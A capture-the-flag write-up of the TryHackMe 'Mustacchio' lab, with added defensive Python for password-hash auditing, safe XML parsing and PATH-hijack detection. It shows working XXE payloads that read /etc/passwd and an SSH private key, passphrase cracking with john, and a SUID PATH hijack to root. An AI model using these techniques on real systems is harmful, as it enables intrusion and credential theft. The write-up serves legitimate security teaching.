Disclaimers
The host penetrated in this article is legally authorized. The tools and methods used in this article are for learning and exchange only. Please do not use the tools and penetration ideas from this article for any illegal purpose. I will not bear responsibility for any consequences, nor be responsible for any misuse or damage.
Service discovery
┌──(root💀kali)-[~/tryhackme/Mustacchio]
└─# nmap -sV -Pn 10.10.7.89
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 01:33 EST
Nmap scan report for 10.10.7.89
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.25 seconds
It seems that only two services are enabled
Directory brute-forcing
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.7.89

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.7.89/_21-11-08_01-36-40.txt

Error Log: /root/dirsearch/logs/errors-21-11-08_01-36-40.log

Target: http://10.10.7.89/

[01:36:41] Starting:
[01:37:08] 200 -   3KB - /about.html
[01:37:42] 400 - 305B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:37:45] 200 -   1KB - /contact.html
[01:37:47] 200 -   1KB - /custom/
[01:37:56] 301 - 314B  - /fonts  ->  http://10.10.7.89/fonts/
[01:37:57] 200 -   2KB - /gallery.html
[01:38:01] 200 -   2KB - /index.html
[01:38:02] 301 - 315B  - /images  ->  http://10.10.7.89/images/
[01:38:02] 200 -   6KB - /images/
[01:38:30] 200 -   28B - /robots.txt
[01:38:31] 403 - 278B  - /server-status
[01:38:32] 403 - 278B  - /server-status/
/custom/ has directory listing enabled. Inside it we find a users.bak file; download it and inspect it with the strings command:
┌──(root💀kali)-[~/Downloads]
└─# strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
]admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
We see a SQLite users table with one username and password hash: admin : 1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
The hash can be looked up on an online hash-cracking site (the original links an MD5 lookup site); the result is:
bulldog19
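Why the lookup site answers instantly: the table stores a bare, unsalted hex digest, so one hash call per guess is enough to test a candidate. The audit below is an added example, not code from the write-up or from the target application; it rebuilds the leaked table in an in-memory SQLite database with the schema printed by strings, flags every password stored as an unsalted fast hash, and shows the salted, iterated storage (PBKDF2-HMAC-SHA256, a choice made here, not something the page prescribes) that would have turned a two-second lookup into an offline cracking job.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed copy of the schema and row recovered from users.bak
# (the table layout is the one printed by `strings` above).
SCHEMA = "CREATE TABLE users(username text NOT NULL, password text NOT NULL)"
SAMPLE_ROW = ("admin", "1868e36a6d2b17d4c2745f1659433a54d4bc5f4b")

# Hex-digest lengths of unsalted, fast hashes that must not be used for passwords.
FAST_HASH_BY_HEXLEN = {32: "MD5", 40: "SHA-1", 64: "SHA-256"}
FAST_HASH_FUNCS = {"MD5": hashlib.md5, "SHA-1": hashlib.sha1, "SHA-256": hashlib.sha256}


def build_sample_db():
    """Create an in-memory SQLite database shaped like the leaked users.bak."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute("INSERT INTO users VALUES (?, ?)", SAMPLE_ROW)
    conn.commit()
    return conn


def classify_stored_password(value):
    """Return the fast-hash family a stored value looks like, or None when it is
    not a bare hex digest (a salted, self-describing format contains '$')."""
    v = value.strip().lower()
    if len(v) in FAST_HASH_BY_HEXLEN and all(c in "0123456789abcdef" for c in v):
        return FAST_HASH_BY_HEXLEN[len(v)]
    return None


def audit_users_table(conn):
    """List (username, family) for every row stored as an unsalted fast hash."""
    findings = []
    for username, stored in conn.execute("SELECT username, password FROM users"):
        family = classify_stored_password(stored)
        if family is not None:
            findings.append((username, family))
    return findings


def fast_hash_matches(candidate, hex_digest):
    """Why an unsalted digest falls to a lookup table: one hash call, no salt."""
    algo = FAST_HASH_FUNCS.get(classify_stored_password(hex_digest))
    return algo is not None and algo(candidate.encode()).hexdigest() == hex_digest.lower()


def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256; returns a self-describing 'algo$iter$salt$digest' string."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Constant-time check of a candidate against a hash_password() string."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    print(audit_users_table(build_sample_db()))  # [('admin', 'SHA-1')]
```

Run against the rebuilt table, the audit reports the admin row as a 40-hex-character SHA-1 digest, while a value produced by hash_password() is not classified as any fast hash. The second lesson from this finding is about the file itself: a database backup under a web-served directory with listing enabled is exposed regardless of how the passwords are hashed.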
So which service do these credentials belong to? I tried SSH, but could not find a login page. I brute-forced directories again with a web wordlist, and no new directories turned up.
Full port scan
I have a habit when doing labs: I first use nmap to scan the common ports quickly, start working on those, and let a full port scan run in the background. Looking back at the full port scan, I found that the target also has an HTTP service on port 8765.
┌──(root💀kali)-[~/tryhackme/Mustacchio]
└─# nmap -sV -Pn 10.10.7.89 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-08 01:35 EST
Nmap scan report for 10.10.7.89
Host is up (0.31s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
8765/tcp open  http    nginx 1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1139.53 seconds
Opening it in the browser shows a login page, which accepts the credentials found above.
XXE attack
After logging in there is a message page. I tried submitting some input but nothing came back. I intercepted the HTTP request with Burp Suite and sent it to Repeater, and the source code echoed in the response revealed two pieces of information.
First, the input must be in XML format. Second, there is a comment in the page source:
Barry, you can now SSH in using your key!
So we know at least one SSH user name: barry
I googled "xxe php" and found this article about XXE (link in the original).
We construct a payload and try to read /etc/passwd:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<root>
  <name>&xxe;</name>
</root>
The file contents are echoed back on the web page:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
joe:x:1002:1002::/home/joe:/bin/bash
barry:x:1003:1003::/home/barry:/bin/bash
We tried brute-forcing barry's SSH password earlier, but the server does not allow password login.
Using the XXE vulnerability, we try to read barry's SSH private key instead. A user's private key is usually stored at /home/$USER/.ssh/id_rsa.
We construct the following payload:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/barry/.ssh/id_rsa" > ]>
<root>
  <name>&xxe;</name>
</root>
The private key is echoed back:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E

jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN
bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU
MZdJ7DH1k226qQMtm4q96MZKEQ5ZFa032SohtfDPsoim/7dNapEOujRmw+ruBE65
l2f9wZCfDaEZvxCSyQFDJjBXm07mqfSJ3d59dwhrG9duruu1/alUUvI/jM8bOS2D
Wfyf3nkYXWyD4SPCSTKcy4U9YW26LG7KMFLcWcG0D3l6l1DwyeUBZmc8UAuQFH7E
NsNswVykkr3gswl2BMTqGz1bw/1gOdCj3Byc1LJ6mRWXfD3HSmWcc/8bHfdvVSgQ
ul7A8ROlzvri7/WHlcIA1SfcrFaUj8vfXi53fip9gBbLf6syOo0zDJ4Vvw3ycOie
TH6b6mGFexRiSaE/u3r54vZzL0KHgXtapzb4gDl/yQJo3wqD1FfY7AC12eUc9NdC
rcvG8XcDg+oBQokDnGVSnGmmvmPxIsVTT3027ykzwei3WVlagMBCOO/ekoYeNWlX
bhl1qTtQ6uC1kHjyTHUKNZVB78eDSankoERLyfcda49k/exHZYTmmKKcdjNQ+KNk
4cpvlG9Qp5Fh7uFCDWohE/qELpRKZ4/k6HiA4FS13D59JlvLCKQ6IwOfIRnstYB8
7+YoMkPWHvKjmS/vMX+elcZcvh47KNdNl4kQx65BSTmrUSK8GgGnqIJu2/G1fBk+
T+gWceS51WrxIJuimmjwuFD3S2XZaVXJSdK7ivD3E8KfWjgMx0zXFu4McnCfAWki
ahYmead6WiWHtM98G/hQ6K6yPDO7GDh7BZuMgpND/LbS+vpBPRzXotClXH6Q99I7
LIuQCN5hCb8ZHFD06A+F2aZNpg0G7FsyTwTnACtZLZ61GdxhNi+3tjOVDGQkPVUs
pkh9gqv5+mdZ6LVEqQ31eW2zdtCUfUu4WSzr+AndHPa2lqt90P+wH2iSd4bMSsxg
laXPXdcVJxmwTs+Kl56fRomKD9YdPtD4Uvyr53Ch7CiiJNsFJg4lY2s7WiAlxx9o
vpJLGMtpzhg8AXJFVAtwaRAFPxn54y1FITXX6tivk62yDRjPsXfzwbMNsvGFgvQK
DZkaeK+bBjXrmuqD4EB9K540RuO6d7kiwKNnTVgTspWlVCebMfLIi76SKtxLVpnF
6aak2iJkMIQ9I0bukDOLXMOAoEamlKJT5g+wZCC5aUI6cZG0Mv0XKbSX2DTmhyUF
ckQU/dcZcx9UXoIFhx7DesqroBTR6fEBlqsn7OPlSFj0lAHHCgIsxPawmlvSm3bs
7bdofhlZBjXYdIlZgBAqdq5jBJU8GtFcGyph9cb3f+C3nkmeDZJGRJwxUYeUS9Of
1dVkfWUhH2x9apWRV8pJM/ByDd0kNWa/c//MrGM0+DKkHoAZKfDl3sC0gdRB7kUQ
+Z87nFImxw95dxVvoZXZvoMSb7Ovf27AUhUeeU8ctWselKRmPw56+xhObBoAbRIn
7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
-----END RSA PRIVATE KEY-----
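Both payloads above work for the same reason: the message endpoint hands user-supplied XML to a parser that honours DOCTYPE entity declarations and resolves a SYSTEM entity against the local filesystem. The parser below is an added example, written here in Python rather than the target's PHP, and is not code from the write-up or from the application; it shows what a message endpoint should do instead: refuse any document that declares entities or references an external DTD, and never resolve an external entity even if one gets through. The two input documents are constructed for the example (the first is the /etc/passwd payload shown above).

```python
import xml.parsers.expat

# Constructed inputs: the XXE payload from the write-up, and a benign message
# of the shape the form expects.
XXE_PAYLOAD = (
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>'
    "<root><name>&xxe;</name></root>"
)
BENIGN_MESSAGE = "<root><name>hello</name><comment>nice site</comment></root>"


class UnsafeXML(ValueError):
    """Raised when a document declares entities or references an external DTD."""


def parse_message(xml_text):
    """Parse <root><field>text</field>...</root> into a dict, rejecting any
    DOCTYPE that declares entities or points at an external DTD."""
    parser = xml.parsers.expat.ParserCreate()
    result = {}
    buf = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # An external DTD (SYSTEM/PUBLIC id) is one more way to smuggle entities in.
        if sysid is not None or pubid is not None:
            raise UnsafeXML("external DTD reference rejected")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # Any <!ENTITY ...> is refused: a message form never needs custom entities.
        raise UnsafeXML(f"entity declaration rejected: {name}")

    def external_entity_ref(context, base, sysid, pubid):
        # Defence in depth: never fetch anything, even if a declaration slipped through.
        raise UnsafeXML("external entity reference rejected")

    def start_element(name, attrs):
        buf.clear()

    def char_data(data):
        buf.append(data)  # expat may deliver text in several chunks

    def end_element(name):
        if name != "root":
            result[name] = "".join(buf).strip()
        buf.clear()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(xml_text, True)
    return result


def is_safe_message(xml_text):
    """True only if the document parses without tripping a guard or being malformed."""
    try:
        parse_message(xml_text)
        return True
    except (UnsafeXML, xml.parsers.expat.ExpatError):
        return False


if __name__ == "__main__":
    print(parse_message(BENIGN_MESSAGE))   # {'name': 'hello', 'comment': 'nice site'}
    print(is_safe_message(XXE_PAYLOAD))    # False
```

The entity-declaration handler fires while the internal subset is being read, so the payload is rejected before the parser ever reaches the &xxe; reference in the body. For the PHP stack this target runs, the equivalent control is to parse without LIBXML_NOENT (which is what enables entity substitution) and, on PHP versions before 8.0, to call libxml_disable_entity_loader(true) first; from PHP 8.0 external entity loading is disabled by default.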
Save the key above on Kali as a file named id_rsa and set its permissions to 600.
This key cannot be used to log in as is: it is passphrase-protected, so use john to crack the passphrase:
┌──(root💀kali)-[~/tryhackme/Mustacchio]
└─# /usr/share/john/ssh2john.py id_rsa > rsacrack

┌──(root💀kali)-[~/tryhackme/Mustacchio]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt rsacrack
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
urieljames       (id_rsa)
1g 0:00:00:23 37.67% (ETA: 02:48:42) 0.04221g/s 233721p/s 233721c/s 233721C/s mikkedhaile..mikkal1933
Session aborted
The passphrase is: urieljames
Getting an initial shell
We log in to barry's account over SSH and get user.txt:
┌──(root💀kali)-[~/tryhackme/Mustacchio]
└─# ssh -i id_rsa barry@10.10.7.89                                                    1 ⨯
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

34 packages can be updated.
16 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

barry@mustacchio:~$ ls
user.txt
Privilege escalation to root
Find all SUID files on the target:
barry@mustacchio:~$ find / -perm -4000 -print
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/newuidmap
/usr/bin/gpasswd
/home/joe/live_log
/bin/ping
/bin/ping6
/bin/umount
/bin/mount
/bin/fusermount
/bin/su
One file stands out: /home/joe/live_log. Use the strings command to view its contents:
barry@mustacchio:/home/joe$ strings live_log
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
printf
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Live Nginx Log Reader
tail -f /var/log/nginx/access.log
Note the embedded shell command tail -f /var/log/nginx/access.log: the SUID binary calls tail (through system, which also appears in the strings output) to follow the web server's access log.
Because tail is invoked by a bare name rather than an absolute path, and the binary inherits our environment, we can use this command to escalate to root.
Prepend /home/barry to $PATH:
barry@mustacchio:/home/joe$ export PATH=/home/barry:$PATH
View the current user's $PATH:
barry@mustacchio:/home/joe$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Create a file named tail and make it executable:
barry@mustacchio:/home/joe$ touch /home/barry/tail
barry@mustacchio:/home/joe$ chmod +x /home/barry/tail
Write the following script into /home/barry/tail:
#!/bin/bash
bash -p
Execute live_log; privileges are successfully raised to root:
barry@mustacchio:/home/joe$ vi /home/barry/tail
barry@mustacchio:/home/joe$ cat /home/barry/tail
#!/bin/bash
bash -p
barry@mustacchio:/home/joe$ ./live_log
root@mustacchio:/home/joe# id
uid=0(root) gid=0(root) groups=0(root),1003(barry)
root@mustacchio:/home/joe# whoami
root
root@mustacchio:/home/joe# cat /root/root.txt
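The escalation above is a textbook PATH hijack: a setuid-root program calls system() with a relative command name, and system() hands that name to /bin/sh, which resolves it through the caller's PATH. The audit script below is an added example and is not part of the write-up or of the lab; it takes the strings output of a binary (a constructed subset of the live_log output above), flags shell-style command strings that name a program without an absolute path, reports whether the binary uses system/popen at all, and then reproduces the lookup offline in a temporary directory to show why a user-controlled PATH entry in front of the system ones is a finding. The KNOWN_COMMANDS list and the risk rules are this example's own choices.

```python
import os
import stat
import tempfile

# Constructed subset of the `strings` output from live_log shown above.
LIVE_LOG_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2",
    "libc.so.6",
    "setuid",
    "system",
    "Live Nginx Log Reader",
    "tail -f /var/log/nginx/access.log",
]

# Programs commonly reached through system(3) from setuid helpers (example's own list).
KNOWN_COMMANDS = {"tail", "cat", "grep", "awk", "sed", "sh", "bash",
                  "cp", "rm", "ls", "less", "more", "head"}


def find_relative_commands(strings_output):
    """Return (string, command) pairs for shell-looking strings whose first
    word is a known program named without an absolute path."""
    hits = []
    for s in strings_output:
        words = s.split()
        if not words:
            continue
        cmd = words[0]
        if os.path.basename(cmd) in KNOWN_COMMANDS and not os.path.isabs(cmd):
            hits.append((s, cmd))
    return hits


def uses_shell(strings_output):
    """True if the binary imports system(3) or popen(3), i.e. commands go through /bin/sh."""
    return any(s in ("system", "popen") for s in strings_output)


def resolve_in_path(command, path_dirs):
    """Mimic the shell's lookup: first executable named `command` along path_dirs."""
    for d in path_dirs:
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijackable_path_dirs(path_dirs):
    """PATH entries a non-root user could plant a binary in: not owned by root,
    or group/world-writable. Missing directories are skipped."""
    risky = []
    for d in path_dirs:
        try:
            st = os.stat(d)
        except FileNotFoundError:
            continue
        if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append(d)
    return risky


def simulate_lookup():
    """Reproduce the write-up's situation offline: a user-controlled directory in
    front of the system ones holding a file named `tail`. Returns
    (lookup_picked_the_planted_file, planted_dir_was_flagged)."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o777)  # constructed: deliberately world-writable
        planted = os.path.join(tmp, "tail")
        with open(planted, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")  # inert stand-in, never executed here
        os.chmod(planted, 0o755)
        path_dirs = [tmp, "/usr/bin", "/bin"]
        resolved = resolve_in_path("tail", path_dirs)
        risky = hijackable_path_dirs(path_dirs)
        return resolved == planted, tmp in risky


if __name__ == "__main__":
    print(find_relative_commands(LIVE_LOG_STRINGS))  # [('tail -f /var/log/nginx/access.log', 'tail')]
    print(uses_shell(LIVE_LOG_STRINGS))               # True
    print(simulate_lookup())                          # (True, True)
```

The fix belongs in the binary, not in the caller's environment: invoke the program by absolute path (or with execve and no shell at all), reset PATH and the rest of the environment before any system() call, and drop the setuid bit entirely where a group with read access to /var/log/nginx would do the job. A periodic run of find / -perm -4000 compared against the distribution's known list, as the write-up does by hand, is the detection side of the same control.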